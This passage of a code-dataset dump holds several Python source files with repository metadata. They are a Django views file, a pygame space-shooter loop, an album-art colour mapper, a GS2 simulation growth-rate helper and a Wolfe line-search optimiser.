resp\n\n\ndef pdfx(request):\n\tresp = HttpResponse(content_type='application/pdf')\n\tresp['Content-Disposition'] = 'attachment; filename=mypdf.pdf'\n\n\t# PDF output is binary, so buffer it in BytesIO (StringIO would fail on bytes)\n\ttmp = BytesIO()\n\tp = canvas.Canvas(tmp)\n\tp.drawString(10, 10, \"hi there A company needs to develop a strategy for software product development for which it has a choice of two programming languages L1 and L2. The number of lines of code (LOC) developed using L2 is estimated to be twice the LOC developed with L1. The product will have to be maintained for five years. Various parameters for the company are given in the table below.\")\n\tp.showPage()\n\tp.save()\n\tresp.write(tmp.getvalue())\n\treturn resp\n\n\n@cache_page(60 * 1)\ndef simpletxt(request):\n\t# anonymous visitors are not logged in\n\tif request.user.is_anonymous:\n\t\treturn HttpResponse(\"not logged in\")\n\telse:\n\t\treturn HttpResponse(\"u r logged in %s\" % request.user.is_superuser)\n\n\ndef log(request):\n\tif request.method == 'POST':\n\t\tusern = request.POST['user']\n\t\tpassw = request.POST['pass']\n\n\t\tuser = auth.authenticate(username=usern, password=passw)\n\t\tif user is not None and user.is_active:\n\t\t\tauth.login(request, user)\n\t\t\treturn HttpResponse(\"successful login\")\n\t\telse:\n\t\t\treturn HttpResponse(\"failed to login\")\n\n\treturn render(request, \"log.html\")\n\n\ndef logout(request):\n\tauth.logout(request)\n\treturn render(request, \"log.html\")\n\n\ndef trans(req):\n\t#translation.activate('de')\n\n\t# if req.LANGUAGE_CODE == 'nl':\n\t# \treturn HttpResponse(\"it is dutch\")\n\t# else:\n\t# \treturn HttpResponse(\"it is still english\")\n\n\t#req.session[translation.LANGUAGE_SESSION_KEY] = 'de'\n\t#req.LANGUAGE_CODE= 'de'\n\t#if 'HTTP_ACCEPT_LANGUAGE' not in req.META:\n\t#\tdel req.META['HTTP_ACCEPT_LANGUAGE']\n\n\toutput = gettext(\"welcome to my site\")\n\ttext = u'header'\n\treturn HttpResponse(text)\n\n\ndef transnl(req):\n\t#req.session[translation.LANGUAGE_SESSION_KEY] = 'nl'\n\t#req.LANGUAGE_CODE= 'nl'\n\n\toutput = gettext(\"welcome to my site\")\n\treturn HttpResponse(settings.LANGUAGE_CODE)\n\n\ndef inter(req):\n\t# if LANGUAGE_CODE == 'de':\n\t# \treturn HttpResponse(\"it is de\")\n\t# else:\n\t# \treturn HttpResponse(\"it is not de\")\n\n\t#return render(req, \"inter.html\")\n\treturn HttpResponse(settings.LANGUAGE_CODE)","repo_name":"mddhif/django","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"34850675176","text":"import sys\nimport pygame\nfrom space_ship import SpaceShip\nfrom game_setting import Settings\nimport game_functions as GAMEFUNCTION\nfrom pygame.sprite import Group\nfrom game_state import GameState\nfrom buttons import Button\n\n\ndef run_game():\n    # Create the Settings object with its default parameters\n    settingCenter = Settings()\n    # Create the GameState object with its default parameters\n    game_state = GameState(settings=settingCenter)\n    # Declare a tuple holding the screen dimensions\n    screen_size = (settingCenter.screen_width,settingCenter.screen_height)\n    # Initialize the game and create a screen object\n    pygame.init()\n    screen = pygame.display.set_mode(screen_size)\n    pygame.display.set_caption(\"Alien Invasion\")\n\n    # Draw the Play button\n    play_button = Button(settings=settingCenter,screen=screen,msg=\"Play\")\n\n    # Draw a ship\n    ship = SpaceShip(screen,settingCenter)\n    # Create a group for storing bullets\n    bullets = Group()\n    # Create a group for storing aliens\n    aliens = Group()\n    # Create an alien fleet\n    GAMEFUNCTION.create_alien_fleet(settings=settingCenter,screen=screen,aliens=aliens,ship=ship)\n    # Start the game's main loop\n    while True:\n        # Watch for keyboard and mouse events\n        GAMEFUNCTION.check_events(ship=ship,settings=settingCenter,bullets=bullets,screen=screen,state=game_state,play_button=play_button)\n        if game_state.game_active == True:\n            # Check whether the ship is in the top-left corner\n            # Update the ship's movement state\n            ship.update()\n            # Update bullet positions\n            GAMEFUNCTION.update_bullets(settings=settingCenter,ship=ship,bullets = bullets,aliens=aliens,screen=screen)\n            # Update alien positions\n            GAMEFUNCTION.update_aliens(settings=settingCenter,aliens = aliens,ship=ship,game_state=game_state,screen=screen,bullets=bullets)\n\n        # Redraw the screen\n        GAMEFUNCTION.update_screen(settingCenter,screen,ship,bullets,aliens,play_button=play_button,state=game_state)\n\n\n\nrun_game()\n\n","repo_name":"dlfkid/AlienInvasion","sub_path":"alien_invation.py","file_name":"alien_invation.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"8501444601","text":"from PIL import Image\nimport numpy as np\nfrom io import BytesIO\nimport colorsys\nimport pickle\nimport json\nimport os\n\nwith open('./react-app/src/config.json') as file:\n CONFIG = json.load(file)\n\nif CONFIG['useImageCache']:\n if os.path.exists('imageCache.pickle'):\n with open('imageCache.pickle', 'rb') as f:\n IMAGE_CACHE = pickle.load(f)\n else:\n IMAGE_CACHE = {}\n\ndef RGBtoHSV(vec):\n return colorsys.rgb_to_hsv(vec[0]/255, vec[1]/255, vec[2]/255)\n\nasync def downloadImage(session, url):\n if CONFIG['useImageCache'] and url in IMAGE_CACHE:\n arr, img = IMAGE_CACHE[url]\n return arr, img\n else:\n async with session.get(url) as res:\n img = Image.open(BytesIO(await res.read()))\n imgArr = np.array(img)\n\n if CONFIG['useImageCache']:\n IMAGE_CACHE[url] = (imgArr, img)\n with open('imageCache.pickle', 'wb') as f:\n pickle.dump(IMAGE_CACHE, f)\n print(f'SAVED img in cache: {url}')\n\n return imgArr, img\n\ndef imgToCoords(img):\n '''\n Builds a polar coordinate point from the average color of an image.\n NOTE: This could easily be changed to use the primary (rather than avg) color.\n '''\n avgColor = np.round(np.mean(img, axis=(1, 0)))\n if len(img.shape) < 3:\n avgColor = np.array([avgColor, avgColor, avgColor])\n\n newcolor = RGBtoHSV(avgColor)\n\n angle = newcolor[0]*360\n depth = newcolor[1]*newcolor[2]\n\n return angle, depth\n\nasync def getImageAndCoords(session, title, url):\n imageArr, image = await downloadImage(session, url)\n angle, depth = imgToCoords(imageArr)\n\n return title, image, (angle, depth)\n\n\n# if __name__ == '__main__':\n# url = 'https://i.scdn.co/image/ab67616d0000b2736ca699e2722b51b1e4ae6091'\n# downloadImage(session, url)\n","repo_name":"eebmagic/spotify-vis","sub_path":"ImageDownloader.py","file_name":"ImageDownloader.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
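A minimal, self-contained sketch of the colour-to-polar mapping that imgToCoords in the record above implements, checked on a solid-colour image (the toy image and variable names are ours; no aiohttp session or cache is needed):

import colorsys
import numpy as np

img = np.zeros((4, 4, 3), dtype=np.uint8)
img[..., 0] = 255  # solid red

avg = np.round(np.mean(img, axis=(1, 0)))  # average colour -> [255, 0, 0]
h, s, v = colorsys.rgb_to_hsv(avg[0] / 255, avg[1] / 255, avg[2] / 255)
angle, depth = h * 360, s * v
print(angle, depth)  # 0.0 1.0 -- pure red sits at hue angle 0 with full depth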
+{"seq_id":"37619890228","text":"\"\"\"Helper module, containing often-used and mature methods. The aim is for this\nscript to be thoroughly tested, and then called by other scripts as needed.\n\nAuthor: Bob Davies\"\"\"\n\nimport ncdf2dict\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import curve_fit\nimport math\nimport sys\nimport xarray as xr\n\nLINEAR_SIMS = \"../../gs2_sims_linear/\"\n\n\ndef linear_growth(xdata, a, b):\n    return a + b*xdata\n\ndef fit_growth_rate_from_phi2(t, phi2):\n    \"\"\"Fit a straight line to the natural logarithm of phi**2. If we assume that\n    phi**2 is described by phi**2 = A*exp(Bt), then log(phi**2) = ln(A) + Bt\"\"\"\n\n    logphi2 = np.log(phi2)\n\n    popt, pcov = curve_fit(linear_growth, t, logphi2)\n    [a_opt, b_opt] = popt\n    growth_rate = b_opt/2\n    growth_rate_stdev = (np.sqrt(pcov[1, 1]))/2\n    fitted_phi2 = np.exp(a_opt)*np.exp(b_opt*t)\n\n    return fitted_phi2, growth_rate, growth_rate_stdev\n\ndef extract_data_from_ncdf(sim_name, *args):\n    \"\"\"Extract data arrays from the NetCDF file for a simulation. Extracts all\n    data given in *args. TO IMPLEMENT:\n    - Tell you if the file doesn't exist\n    - If args don't exist, view_ncdf variables\"\"\"\n\n    # Convert the input file to a python dictionary\n    data = ncdf2dict.ncdf2dict(sim_name)\n    datalist = []\n    # Extract each array specified in args, and add it to the list\n    for arg in args:\n        datalist.append(data[arg])\n\n    return datalist\n\ndef extract_data_from_ncdf_with_xarray(sim_name, *args):\n    \"\"\"Extract data arrays from the NetCDF file for a simulation. Extracts all\n    data given in *args. TO IMPLEMENT:\n    - Tell you if the file doesn't exist\n    - If args don't exist, view_ncdf variables\"\"\"\n\n    # Convert the input file to a python dictionary\n    data = xr.open_dataset(sim_name)\n    datalist = []\n\n    # Extract each array specified in args, and add it to the list\n    for arg in args:\n        datalist.append(data[arg])\n\n    return datalist\n\ndef view_ncdf_variables(outnc_longname):\n    \"\"\"View the names of all variables in the netcdf file\"\"\"\n    data = ncdf2dict.ncdf2dict(outnc_longname)\n    print(list(data.keys()))\n    return\n\ndef compare_growth_rate_to_gs2(fitted_growth_rate, omega_average):\n    \"\"\"Compares the fitted value of the growth rate to the values given\n    by GS2.\"\"\"\n\n    OMEGA_CONV_TOLERANCE = 10**-4 # Maximum st. dev. of growth rates sample\n    OMEGA_FIT_TOLERANCE = 10**-3 # Maximum fractional difference between fitted\n                                 # and GS2-provided growth rates.\n    warnings = 0\n    growth_rates = omega_average.imag\n    # We find the converged frequency from the final 20% of the frequency\n    # values\n    sample_size = max(len(growth_rates)//5, 20) # // to force sample_size to integer value\n    if len(growth_rates) < sample_size:\n        # print(\"Warning! Not enough growth rate values to compare with GS2 reliably.\")\n        sample_size = len(growth_rates) - 1\n\n    sample_growth_rates = growth_rates[-sample_size:]\n\n    converged_growth_rate = np.average(sample_growth_rates)\n    sample_stdev = np.std(sample_growth_rates)\n    # if sample_stdev > OMEGA_CONV_TOLERANCE:\n    #     print((\"Warning! Growth rate may not have converged, standard deviation of \" +\n    #            \"frequency sample is \" + str(sample_stdev)))\n\n    # Compare converged and fitted growth rates - we find the fractional\n    # difference by dividing by the converged growth rate rather than the\n    # fitted growth rate, because fitting errors may cause the latter to have\n    # strange values.\n    # if (((converged_growth_rate - fitted_growth_rate)/converged_growth_rate)\n    #     > OMEGA_FIT_TOLERANCE):\n    #     warnings +=1\n    #     print((\"Warning! Fitted and converged growth rates do not match \" +\n    #            \"within specified tolerance. Converged growth rate, \" +\n    #            \"fitted growth rate = \" + str(converged_growth_rate) + \", \" +\n    #            str(fitted_growth_rate)))\n\n    # if warnings == 0:\n    #     print(\"Growth rate fit successful!\")\n    return\n\ndef calculate_converged_frequency(t, omega_average):\n    \"\"\"Calculates the frequency given by GS2, and checks if it has converged to\n    a reasonable level.\n\n    Bob 23/04/21: Modified to simply take the last point for frequency; frequency tends to\n    bifurcate, rather than converge, so the only way to see if we've actually\n    converged is to look at frequency(time)\"\"\"\n\n    FREQ_CONV_TOLERANCE = 10**-4\n\n    frequency = omega_average.real\n    # We find the converged frequency from the final 20% of the frequency\n    # values\n    sample_size = max(len(frequency)//5, 20) # // to force sample_size to integer value\n    if len(frequency) < sample_size:\n        #print(\"Warning! Not enough growth rate values to compare with GS2 reliably.\")\n        sample_size = len(frequency) -1\n    sample_frequencies = frequency[-sample_size:]\n\n    converged_frequency = np.average(sample_frequencies)\n    sample_stdev = np.std(sample_frequencies)\n    # if sample_stdev > FREQ_CONV_TOLERANCE:\n    #     print((\"Warning! Frequency may not have converged, standard deviation of \" +\n    #            \"frequency sample is \" + str(sample_stdev)))\n\n    conv_freq_tlims = [t[-sample_size], t[-1]]\n    return frequency[-1][0][0], sample_stdev, conv_freq_tlims\n\ndef chop_fitting_data(t, phi2):\n    \"\"\"Chop t and phi2 for fitting the growth rate, according to the following rules:\n    - Remove 'nan's and 'inf's\n    - Of the remaining data, take the latter half of it \"\"\"\n    MIN_NSTEPS = 20\n    MIN_NSTEPS_ERROR = 4\n    # Convert from lists to arrays\n    t = np.asarray(t)\n    phi2 = np.asarray(phi2)\n\n    # Check that all time values are finite - if any isn't, something strange has\n    # occurred and we should terminate.\n    if not np.isfinite(t).all():\n        print(\"Error! Non-finite t values detected.\")\n        print(\"t= \", t)\n        sys.exit(\"Script stopped\")\n\n    if not np.isfinite(phi2).all():\n        #print(\"Warning! Non-finite phi2 values detected\")\n        valid_value_array = np.isfinite(phi2)\n        invalid_value_idxs = np.where(valid_value_array == False)\n        #print \"False idxs = \", invalid_value_idxs\n        #print \"invalid_value_idxs[0] = \", invalid_value_idxs[0]\n        t = t[:invalid_value_idxs[0][0]]; phi2 = phi2[:invalid_value_idxs[0][0]]\n\n    nsteps = len(t)\n    # if nsteps < MIN_NSTEPS:\n    #     print(\"Non-critical warning! Number of phi2 data points = \", nsteps)\n    #     print(\"t = \", t)\n    #     print(\"phi2 = \", phi2)\n    if nsteps < MIN_NSTEPS_ERROR:\n        print(\"Critical warning! Number of phi2 data points = \", nsteps)\n        print(\"t = \", t)\n        print(\"phi2 = \", phi2)\n        raise Exception\n\n    return t[(nsteps//2):], phi2[(nsteps//2):] # // because we want an integer, not a float\n\ndef lazy_calculate_omega(sim_name, return_fitted_vals=False):\n    \"\"\"Calculate the growth rate based on phi**2(t), designed for simulations\n    where omega_average has not been saved.\"\"\"\n\n    [t, phi2] = extract_data_from_ncdf(sim_name, 't', 'phi2')\n\n    # Only use the last half of the data to fit the growth rate - hopefully,\n    # the growth rate has converged at this point.\n    print(\"sim_name = \", sim_name)\n    t_chopped, phi2_chopped = chop_fitting_data(t, phi2)\n    fitted_phi2, fitted_growth_rate, growth_rate_error = (\n        fit_growth_rate_from_phi2(t_chopped, phi2_chopped))\n\n    if return_fitted_vals==True:\n        sys.exit(\"Method currently has no implementation of return_fitted_vals, aborting.\")\n    else:\n        return (fitted_growth_rate, growth_rate_error)\n\ndef calculate_omega(sim_name, return_fitted_vals=False):\n    \"\"\"Calculates the growth rate for a simulation based on phi**2(t) and\n    compares it to the values calculated by GS2.\"\"\"\n\n    try:\n        [t, phi2, omega_average] = extract_data_from_ncdf(sim_name, 't', 'phi2',\n                                                          'omega_average')\n    except KeyError:\n        [t, phi2, omega_average] = extract_data_from_ncdf(sim_name, 't', 'phi2',\n                                                          'omegaavg')\n\n    # Only use the last half of the data to fit the growth rate - hopefully,\n    # the growth rate has converged at this point.\n\n    try:\n        t_chopped, phi2_chopped = chop_fitting_data(t, phi2)\n        fitted_phi2, fitted_growth_rate, growth_rate_error = (\n            fit_growth_rate_from_phi2(t_chopped, phi2_chopped))\n        compare_growth_rate_to_gs2(fitted_growth_rate, omega_average)\n        converged_frequency, freq_error, conv_freq_tlims = calculate_converged_frequency(t, omega_average)\n    except Exception: # Likely caused by too few points to plot.\n        t_chopped = None\n        fitted_phi2 = None\n        fitted_growth_rate = omega_average[-1].imag\n        growth_rate_error = None\n        converged_frequency = omega_average[-1].real\n        freq_error = None\n        conv_freq_tlims = None\n\n    if return_fitted_vals==True:\n        return (t, t_chopped, phi2, fitted_phi2, fitted_growth_rate, growth_rate_error,\n                converged_frequency, freq_error, conv_freq_tlims, omega_average)\n    else:\n        return (fitted_growth_rate, growth_rate_error, converged_frequency,\n                freq_error)\n\ndef calculate_omega_kykx(sim_name, return_fitted_vals=False):\n    \"\"\"Calculates the growth rate for a simulation based on phi**2(t) and\n    compares it to the values calculated by GS2.\"\"\"\n\n    #view_ncdf_variables(sim_name)\n    try:\n        [t, phi2_kykx, omega_average_kykx] = extract_data_from_ncdf(sim_name, 't', 'phi2_by_mode',\n                                                                    'omega_average')\n    except KeyError:\n        [t, phi2_kykx, omega_average_kykx] = extract_data_from_ncdf(sim_name, 't', 'phi2_by_mode',\n                                                                    'omegaavg')\n\n    # print(\"phi2.shape = \", phi2.shape)\n    # print(\"omega_average.shape = \", omega_average.shape)\n    n_ky = phi2_kykx.shape[1]; n_kx = phi2_kykx.shape[2]\n\n    fitted_growth_rate_kykx = np.zeros((n_ky, n_kx))\n    growth_rate_error_kykx = np.zeros((n_ky, n_kx))\n    converged_frequency_kykx = np.zeros((n_ky, n_kx))\n    freq_error_kykx = np.zeros((n_ky, n_kx))\n\n    for ky_idx in range(0, n_ky):\n        for kx_idx in range(0, n_kx):\n\n            phi2 = phi2_kykx[:, ky_idx, kx_idx]\n            omega_average = omega_average_kykx[:, ky_idx, kx_idx]\n\n            # Only use the last half of the data to fit the growth rate - hopefully,\n            # the growth rate has converged at this point.\n\n            t_chopped, phi2_chopped = chop_fitting_data(t, phi2)\n            fitted_phi2, fitted_growth_rate, growth_rate_error = (\n                fit_growth_rate_from_phi2(t_chopped, phi2_chopped))\n            #print(\"calculate_omega fitted_growth_rate = \", fitted_growth_rate)\n            compare_growth_rate_to_gs2(fitted_growth_rate, omega_average)\n            converged_frequency, freq_error, conv_freq_tlims = calculate_converged_frequency(t, omega_average)\n\n            fitted_growth_rate_kykx[ky_idx, kx_idx] = fitted_growth_rate\n            growth_rate_error_kykx[ky_idx, kx_idx] = growth_rate_error\n            converged_frequency_kykx[ky_idx, kx_idx] = converged_frequency\n            freq_error_kykx[ky_idx, kx_idx] = freq_error\n\n    #\n    # if return_fitted_vals==True:\n    #     return (t, t_chopped, phi2, fitted_phi2, fitted_growth_rate, growth_rate_error,\n    #             converged_frequency, freq_error, conv_freq_tlims, omega_average)\n\n    return (fitted_growth_rate_kykx, growth_rate_error_kykx, converged_frequency_kykx,\n            freq_error_kykx)\n\ndef plot_growth_rates(sim_name, title, save_loc=\"./\", include_phi=False):\n    \"\"\"For visual inspection of omega-related outputs of simulation. Plots\n    phi**2(t) and omega_average(t), along with the fitted growth rate.\"\"\"\n\n    (t, t_chopped, phi2, fitted_phi2, fitted_growth_rate, growth_rate_error, converged_frequency,\n     freq_error, conv_freq_tlims, omega_average) = calculate_omega(sim_name, return_fitted_vals=True)\n    try:\n        [theta, phi_by_mode] = extract_data_from_ncdf(sim_name, 'theta', 'phi')\n    except KeyError:\n        print(\"Error getting mode structure\")\n        return\n\n    absphi = phi_by_mode[0][0]\n    absphi = abs(absphi/max(abs(absphi)))\n\n    # Plot phi**2(t)\n    fig = plt.figure(1, figsize=(17.0, 9.6))\n    fig.suptitle(title, fontsize=24, fontweight='bold')\n    ax1 = fig.add_subplot(221)\n    ax1.scatter(t, phi2, c=\"black\", marker=\"+\", label=\"phi**2\")\n    if fitted_phi2 is not None:\n        ax1.plot(t_chopped, fitted_phi2, c='r',\n                 label=\"Fitted to log(phi**2)\")\n    ax1.set_yscale('log')\n    ax1.legend(loc=\"best\")\n    ax1.set_xlabel(\"time (normalised GS2 units)\")\n    ax1.set_ylabel(\"phi**2 (normalised GS2 units)\")\n\n    # Plot frequency(t)\n    ax2 = fig.add_subplot(222)\n    ax2.scatter(t, omega_average.real, c='black', marker =\"x\", label=\"omega_average\")\n    #print(\"omega_average.shape, omega_average[-1] = \", omega_average.shape, omega_average[-1])\n    ax2.text(np.min(t), np.max(omega_average.real)/2, \"freq[-1] = {:.5f}\".format(omega_average[-1,0,0].real))\n    if conv_freq_tlims is not None:\n        ax2.plot(conv_freq_tlims, [converged_frequency, converged_frequency], c=\"r\",\n                 label=\"converged frequency\")\n    #ax2.set_xlabel(\"time (normalised GS2 units)\")\n    ax2.set_ylabel(\"frequency (normalised GS2 units)\")\n    ax2.legend(loc='best')\n    ax2.tick_params('y', which='both', labelsize=8, direction=\"in\")\n    ax2.tick_params('x', which='both', labelsize=8, direction=\"in\", bottom=False)\n    ax2.grid(True, which=\"both\", axis=\"both\", linestyle=\"--\")\n    ax2.set_axisbelow(True)\n    plt.setp(ax2.get_xticklabels(), visible=False)\n\n    # Plot GS2's growth rate(t)\n    ax3 = fig.add_subplot(224, sharex=ax2)\n    ax3.scatter(t, omega_average.imag, c='black', marker =\"x\", label=\"omega_average\")\n    ax3.text(np.min(t), np.max(omega_average.imag)/2, \"growth rate[-1] = {:.5f}\".format(omega_average[-1,0,0].imag))\n    if t_chopped is not None:\n        ax3.plot([t_chopped[0], t_chopped[-1]], [fitted_growth_rate, fitted_growth_rate],\n                 c='r', label=\"Fitted to log(phi**2)\")\n    ax3.set_xlabel(\"time (normalised GS2 units)\")\n    ax3.legend(loc='best')\n    ax3.set_ylabel(\"growth rate (normalised GS2 units)\")\n    ax3.set_axisbelow(True)\n    ax3.tick_params('both', which='both', labelsize=8, direction=\"in\")\n    ax3.grid(True, which=\"both\", axis=\"both\", linestyle=\"--\")\n    #ax3.title(title)\n    ax4 = fig.add_subplot(223)\n    ax4.plot(theta/np.pi, absphi, c=\"black\")\n    ax4.set_xlabel(r\"$\\theta/\\pi$\")\n    ax4.set_ylabel(r\"$\\vert \\phi \\vert$\")\n    ax4.tick_params('both', which='both', labelsize=8, direction=\"in\")\n    ax4.grid(True, which=\"both\", axis=\"both\", linestyle=\"--\")\n    plt.savefig(save_loc + title + \".png\")\n    plt.close()\n    return\n\ndef plot_phi2_from_nc(sim_name, title, save_loc=\"./\"):\n    \"\"\"For visual inspection of omega-related outputs of simulation. Plots\n    phi**2(t) and omega_average(t), along with the fitted growth rate.\"\"\"\n\n    [t, phi2, omega_average] = extract_data_from_ncdf(sim_name, 't', 'phi2',\n                                                      'omega_average')\n\n    # Plot phi**2(t)\n    fig = plt.figure(1, figsize=(17.0, 9.6))\n    fig.suptitle(title, fontsize=24, fontweight='bold')\n    ax1 = fig.add_subplot(111)\n    ax1.scatter(t, phi2, c=\"black\", marker=\"+\", label=\"phi**2\")\n    ax1.set_yscale('log')\n    ax1.legend(loc=\"best\")\n    ax1.set_xlabel(\"time (normalised GS2 units)\")\n    ax1.set_ylabel(\"phi**2 (normalised GS2 units)\")\n\n    plt.savefig(save_loc + title + \".png\")\n    plt.close()\n\n    return\n\ndef plot_multiple_growth_rates(sims, title, save_loc=\"./\", labels=[]):\n    \"\"\"For visual inspection of omega-related outputs of simulation. Plots\n    phi**2(t) and omega_average(t), along with the fitted growth rate.\"\"\"\n\n    if len(labels) == 0:\n        labels = sims\n\n    fig = plt.figure(1, figsize=(17.0, 9.6))\n    fig.suptitle(title, fontsize=24, fontweight='bold')\n    ax1 = fig.add_subplot(121)\n    ax2 = fig.add_subplot(222)\n    ax3 = fig.add_subplot(224, sharex=ax2)\n\n    for i, sim_name in enumerate(sims):\n        (t, t_chopped, phi2, fitted_phi2, fitted_growth_rate, growth_rate_error, converged_frequency,\n         freq_error, conv_freq_tlims, omega_average) = calculate_omega(sim_name, return_fitted_vals=True)\n\n        # Plot phi**2(t)\n        ax1.scatter(t, phi2, marker=\"+\")\n        ax1.plot(t_chopped, fitted_phi2, label=labels[i])\n\n        # Plot frequency(t)\n        ax2.scatter(t, omega_average.real, marker =\"x\", label=labels[i])\n        ax2.plot(conv_freq_tlims, [converged_frequency, converged_frequency])\n\n        # Plot GS2's growth rate(t)\n        ax3.scatter(t, omega_average.imag, marker =\"x\", label=labels[i])\n        ax3.plot([t_chopped[0], t_chopped[-1]], [fitted_growth_rate, fitted_growth_rate])\n\n    ax1.set_yscale('log')\n    ax1.legend(loc=\"best\")\n    ax1.set_xlabel(\"time (normalised GS2 units)\")\n    ax1.set_ylabel(\"phi**2 (normalised GS2 units)\")\n    ax2.set_ylabel(\"frequency (normalised GS2 units)\")\n    ax2.legend(loc='best')\n    ax2.tick_params('y', which='both', labelsize=8, direction=\"in\")\n    ax2.tick_params('x', which='both', labelsize=8, direction=\"in\", bottom=False)\n    ax2.grid(True, which=\"both\", axis=\"both\", linestyle=\"--\")\n    ax2.set_axisbelow(True)\n    plt.setp(ax2.get_xticklabels(), visible=False)\n\n    ax3.set_xlabel(\"time (normalised GS2 units)\")\n    ax3.legend(loc='best')\n    ax3.set_ylabel(\"growth rate (normalised GS2 units)\")\n    ax3.set_axisbelow(True)\n    ax3.tick_params('both', which='both', labelsize=8, direction=\"in\")\n    ax3.grid(True, which=\"both\", axis=\"both\", linestyle=\"--\")\n    plt.show()\n    #plt.savefig(save_loc + title + \".png\")\n    #plt.close()\n    return\n\ndef view_ncdf_variables_with_xarray(sim_name):\n    \"\"\"View the names of all variables in the netcdf file\"\"\"\n    data = xr.open_dataset(sim_name)\n    print(list(data.keys()))\n    return\n\nif __name__ == \"__main__\":\n    outnc_longname = LINEAR_SIMS + \"lowq0_psinkx_scan_millerparams_1/run_psin_0.15_ky_0.15_kx_0.03/input.out.nc\"\n    view_ncdf_variables(outnc_longname)\n    [kx] = extract_data_from_ncdf(outnc_longname, \"kx\")\n    print(\"kx = \", kx)\n","repo_name":"rd1042/stella_benchmarking_new","sub_path":"postprocessing_tools/helper_ncdf_new.py","file_name":"helper_ncdf_new.py","file_ext":"py","file_size_in_byte":18208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
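The fitting trick at the heart of the record above deserves a sanity check: if phi**2 = A*exp(B*t), a straight-line fit to log(phi**2) recovers B, and the growth rate of phi itself is B/2. A hedged, synthetic-data-only sketch (not part of the original module):

import numpy as np
from scipy.optimize import curve_fit

t = np.linspace(0.0, 10.0, 50)
gamma_true = 0.3                            # chosen for the demo
phi2 = 2.0 * np.exp(2.0 * gamma_true * t)   # phi ~ exp(gamma*t) => phi**2 ~ exp(2*gamma*t)

popt, _ = curve_fit(lambda x, a, b: a + b * x, t, np.log(phi2))
print(popt[1] / 2)                          # ~0.3, recovering gamma_true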
+{"seq_id":"29155356002","text":"import numpy as np\nimport copy\n\nfrom .line_search import LineSearch\n\nclass Wolfe(LineSearch):\n \"\"\"\n Wolfe line search with optional resetting of the initial stepsize\n at each iteration. If resetting is used, the previous value is used\n as the first stepsize to try at this iteration. Otherwise, it starts\n with the maximal stepsize.\n Arguments:\n armijo_const (float, optional): proportionality constant for the armijo condition (default: 0.5)\n wolfe_const (float, optional): second proportionality constant for the wolfe condition (default: 0.5)\n start_with_prev_lr (boolean, optional): sets the reset option from (default: True)\n backtracking (float, optional): constant by which the current stepsize is multiplied (default: 0.5)\n \"\"\"\n \n def __init__(self, armijo_const=0.1, wolfe_const=0.9, strong=False, \n start_with_prev_lr=True, backtracking=0.5, *args, **kwargs):\n super(Wolfe, self).__init__(*args, **kwargs)\n self.armijo_const = armijo_const\n self.wolfe_const = wolfe_const\n self.strong = strong\n self.start_with_prev_lr = start_with_prev_lr\n self.backtracking = backtracking\n self.x_prev = None\n self.val_prev = None\n \n def armijo_condition(self, gradient, x, x_new):\n value_new = self.loss.value(x_new)\n self.x_prev = copy.deepcopy(x_new)\n self.val_prev = value_new\n descent = self.armijo_const * self.loss.inner_prod(gradient, x - x_new)\n return value_new <= self.current_value - descent + self.tolerance\n \n def curvature_condition(self, gradient, x, x_new):\n grad_new = self.loss.gradient(x_new)\n curv_x = self.loss.inner_prod(gradient, x - x_new)\n curv_x_new = self.loss.inner_prod(grad_new, x - x_new)\n if self.strong:\n curv_x, curv_x_new = np.abs(curv_x), np.abs(curv_x_new)\n return curv_x_new <= self.wolfe_const * curv_x + self.tolerance\n \n def __call__(self, x=None, x_new=None, gradient=None, direction=None):\n if gradient is None:\n gradient = self.optimizer.grad\n if x is None:\n x = self.optimizer.x\n if direction is None:\n direction = (x_new - x) / self.lr\n self.lr = self.lr if self.start_with_prev_lr else self.lr0\n if x_new is None:\n x_new = x + self.lr * direction\n if self.loss.is_equal(x, self.x_prev):\n self.current_value = self.val_prev\n else:\n self.current_value = self.loss.value(x)\n \n armijo_condition = self.armijo_condition(gradient, x, x_new)\n curvature_condition = self.curvature_condition(gradient, x, x_new)\n it_extra = 0\n it_max = min(self.it_max, self.optimizer.ls_it_max - self.it)\n while not armijo_condition and it_extra < it_max:\n self.lr *= self.backtracking\n x_new = x + self.lr * direction\n armijo_condition = self.armijo_condition(gradient, x, x_new)\n it_extra += 1\n if it_extra == 0:\n while not curvature_condition and it_extra < it_max:\n self.lr /= self.backtracking\n x_new = x + self.lr * direction\n curvature_condition = self.curvature_condition(gradient, x, x_new)\n it_extra += 1\n \n self.it += self.it_per_call + it_extra\n return x_new\n","repo_name":"konstmish/opt_methods","sub_path":"optmethods/line_search/wolfe.py","file_name":"wolfe.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"37"}
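The Wolfe class above leans on the package's LineSearch base class and loss interface, so it is not runnable on its own. A stripped-down illustration of the same Armijo backtracking loop on f(x) = x**2 (all names here are ours, not the library's):

def armijo_backtracking(f, grad, x, direction, lr=1.0, c=0.1, backtracking=0.5):
    # shrink lr until f(x + lr*d) <= f(x) + c * lr * f'(x) * d
    fx = f(x)
    while f(x + lr * direction) > fx + c * lr * grad(x) * direction:
        lr *= backtracking
    return lr

f = lambda x: x ** 2
grad = lambda x: 2 * x
step = armijo_backtracking(f, grad, x=1.0, direction=-grad(1.0))
print(step, 1.0 + step * -grad(1.0))  # 0.5, 0.0 -- one exact step to the minimum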
